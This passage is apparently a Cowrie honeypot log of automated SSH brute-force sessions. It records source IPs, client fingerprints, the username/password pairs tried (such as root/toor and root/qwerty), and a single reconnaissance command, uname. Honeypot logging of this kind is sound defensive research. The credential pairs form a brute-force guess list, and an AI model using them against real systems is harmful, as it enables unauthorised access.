@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.732242Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.780777Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:20:23.827544Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.828248Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.843410Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.844549Z","src_ip":"217.154.1.158","session":"b4377275d851"}
{"eventid":"cowrie.login.success","username":"root","password":"Nishith@123","message":"login attempt [root/Nishith@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:20:23.864758Z","src_ip":"212.227.235.229","session":"467ebe3dc6fc"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:24.847580Z","src_ip":"212.227.235.229","session":"467ebe3dc6fc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39858,"dst_ip":"1.2.3.4","dst_port":22,"session":"692bec6608bb","protocol":"ssh","message":"New connection: 217.154.1.158:39858 (1.2.3.4:22) [session: 692bec6608bb]","sensor":"my-vps","timestamp":"2025-08-26T20:20:40.889884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:20:40.890827Z","src_ip":"217.154.1.158","session":"692bec6608bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:20:40.905081Z","src_ip":"217.154.1.158","session":"692bec6608bb"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T20:20:40.948045Z","src_ip":"217.154.1.158","session":"692bec6608bb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:41.964523Z","src_ip":"217.154.1.158","session":"692bec6608bb"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33326,"dst_ip":"1.2.3.4","dst_port":22,"session":"89dd4fe15a6d","protocol":"ssh","message":"New connection: 217.154.1.158:33326 (1.2.3.4:22) [session: 89dd4fe15a6d]","sensor":"my-vps","timestamp":"2025-08-26T20:20:57.920401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:20:57.921355Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:20:57.935088Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:20:57.980003Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:20:58.091232Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:20:58.092036Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:58.107013Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:20:58.108055Z","src_ip":"217.154.1.158","session":"89dd4fe15a6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38764,"dst_ip":"1.2.3.4","dst_port":22,"session":"83f2b0124ec7","protocol":"ssh","message":"New connection: 212.227.235.229:38764 (1.2.3.4:22) [session: 83f2b0124ec7]","sensor":"my-vps","timestamp":"2025-08-26T20:21:05.236293Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:21:05.327933Z","src_ip":"212.227.235.229","session":"83f2b0124ec7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52212,"dst_ip":"1.2.3.4","dst_port":22,"session":"152e080736ab","protocol":"ssh","message":"New connection: 212.227.125.160:52212 (1.2.3.4:22) [session: 152e080736ab]","sensor":"my-vps","timestamp":"2025-08-26T20:21:08.665951Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:21:08.716082Z","src_ip":"212.227.125.160","session":"152e080736ab"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57442,"dst_ip":"1.2.3.4","dst_port":22,"session":"051907fdac6a","protocol":"ssh","message":"New connection: 217.154.1.158:57442 (1.2.3.4:22) [session: 051907fdac6a]","sensor":"my-vps","timestamp":"2025-08-26T20:21:15.057599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:21:15.058849Z","src_ip":"217.154.1.158","session":"051907fdac6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:21:15.073273Z","src_ip":"217.154.1.158","session":"051907fdac6a"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:21:15.119982Z","src_ip":"217.154.1.158","session":"051907fdac6a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:21:16.136597Z","src_ip":"217.154.1.158","session":"051907fdac6a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44910,"dst_ip":"1.2.3.4","dst_port":22,"session":"6385ee631e59","protocol":"ssh","message":"New connection: 217.154.1.158:44910 (1.2.3.4:22) [session: 6385ee631e59]","sensor":"my-vps","timestamp":"2025-08-26T20:21:31.968437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:21:31.969327Z","src_ip":"217.154.1.158","session":"6385ee631e59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:21:31.983074Z","src_ip":"217.154.1.158","session":"6385ee631e59"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:21:32.026737Z","src_ip":"217.154.1.158","session":"6385ee631e59"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:21:33.042474Z","src_ip":"217.154.1.158","session":"6385ee631e59"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35670,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9aba1609cc7","protocol":"ssh","message":"New connection: 217.154.1.158:35670 (1.2.3.4:22) [session: a9aba1609cc7]","sensor":"my-vps","timestamp":"2025-08-26T20:21:48.973228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:21:48.974429Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:21:48.989533Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:21:49.034451Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:21:49.089534Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:21:49.090536Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:21:49.106164Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:21:49.107296Z","src_ip":"217.154.1.158","session":"a9aba1609cc7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39466,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebec0f41f5f6","protocol":"ssh","message":"New connection: 217.154.1.158:39466 (1.2.3.4:22) [session: ebec0f41f5f6]","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.168110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.169005Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.183011Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.227831Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:22:06.331991Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.332793Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.348174Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:06.349309Z","src_ip":"217.154.1.158","session":"ebec0f41f5f6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40284,"dst_ip":"1.2.3.4","dst_port":22,"session":"12ffb967c8a5","protocol":"ssh","message":"New connection: 217.154.1.158:40284 (1.2.3.4:22) [session: 12ffb967c8a5]","sensor":"my-vps","timestamp":"2025-08-26T20:22:23.291772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:22:23.292591Z","src_ip":"217.154.1.158","session":"12ffb967c8a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:22:23.307556Z","src_ip":"217.154.1.158","session":"12ffb967c8a5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T20:22:23.357466Z","src_ip":"217.154.1.158","session":"12ffb967c8a5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:24.373839Z","src_ip":"217.154.1.158","session":"12ffb967c8a5"}
{"eventid":"cowrie.session.connect","src_ip":"103.203.57.19","src_port":49542,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b818afe9cd8","protocol":"telnet","message":"New connection: 103.203.57.19:49542 (1.2.3.4:23) [session: 3b818afe9cd8]","sensor":"my-vps","timestamp":"2025-08-26T20:22:26.382986Z"}
{"eventid":"cowrie.session.closed","duration":5.000006437301636,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:22:31.382908Z","src_ip":"103.203.57.19","session":"3b818afe9cd8"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35104,"dst_ip":"1.2.3.4","dst_port":22,"session":"272685f71a04","protocol":"ssh","message":"New connection: 217.154.1.158:35104 (1.2.3.4:22) [session: 272685f71a04]","sensor":"my-vps","timestamp":"2025-08-26T20:22:40.263691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:22:40.264746Z","src_ip":"217.154.1.158","session":"272685f71a04"}
